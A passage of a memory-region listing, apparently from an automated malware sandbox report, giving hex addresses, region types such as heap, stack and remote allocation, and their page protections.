|
page read and write
|
||
|
6C49000
|
heap
|
page read and write
|
||
|
8857000
|
heap
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
241D2000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
2410E000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
23D5F000
|
stack
|
page read and write
|
||
|
4250000
|
trusted library allocation
|
page read and write
|
||
|
23E9A000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page read and write
|
||
|
240E0000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
6CF5000
|
heap
|
page read and write
|
||
|
240D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
804C000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
261A0000
|
heap
|
page execute and read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
26847000
|
trusted library allocation
|
page read and write
|
||
|
5A87000
|
remote allocation
|
page execute and read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
23B9F000
|
stack
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
23BDE000
|
stack
|
page read and write
|
||
|
2407C000
|
stack
|
page read and write
|
||
|
25179000
|
trusted library allocation
|
page read and write
|
||
|
875B000
|
heap
|
page read and write
|
||
|
2675E000
|
stack
|
page read and write
|
||
|
7FFE000
|
heap
|
page read and write
|
||
|
26190000
|
remote allocation
|
page read and write
|
||
|
270EF000
|
stack
|
page read and write
|
||
|
24121000
|
trusted library allocation
|
page read and write
|
||
|
8022000
|
heap
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
267C7000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
28E0000
|
trusted library section
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
24132000
|
trusted library allocation
|
page read and write
|
||
|
9ED7000
|
direct allocation
|
page execute and read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
78F000
|
heap
|
page read and write
|
||
|
8743000
|
heap
|
page read and write
|
||
|
26420000
|
heap
|
page read and write
|
||
|
23DAD000
|
stack
|
page read and write
|
||
|
58B1000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
264E0000
|
heap
|
page read and write
|
||
|
7E30000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
472E000
|
stack
|
page read and write
|
||
|
6C27000
|
trusted library allocation
|
page read and write
|
||
|
6C59000
|
heap
|
page read and write
|
||
|
7CD5000
|
trusted library allocation
|
page read and write
|
||
|
59D000
|
heap
|
page read and write
|
||
|
2648C000
|
heap
|
page read and write
|
||
|
2950000
|
trusted library allocation
|
page read and write
|
||
|
24186000
|
trusted library allocation
|
page read and write
|
||
|
267B0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
4A8000
|
stack
|
page read and write
|
||
|
6AEE000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
7EAC000
|
stack
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
41FC000
|
stack
|
page read and write
|
||
|
4EF0000
|
trusted library allocation
|
page read and write
|
||
|
5E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
465000
|
unkown
|
page readonly
|
||
|
28AF000
|
stack
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
267C3000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
23F80000
|
trusted library allocation
|
page read and write
|
||
|
7C30000
|
heap
|
page read and write
|
||
|
26FF0000
|
trusted library allocation
|
page read and write
|
||
|
267C0000
|
trusted library allocation
|
page read and write
|
||
|
261B1000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
6F00000
|
trusted library allocation
|
page read and write
|
||
|
25151000
|
trusted library allocation
|
page read and write
|
||
|
46C000
|
stack
|
page read and write
|
||
|
263BE000
|
stack
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
2669D000
|
stack
|
page read and write
|
||
|
264F0000
|
heap
|
page read and write
|
||
|
830000
|
trusted library allocation
|
page execute and read and write
|
||
|
87BC000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
There are 537 hidden memdumps, click here to show them.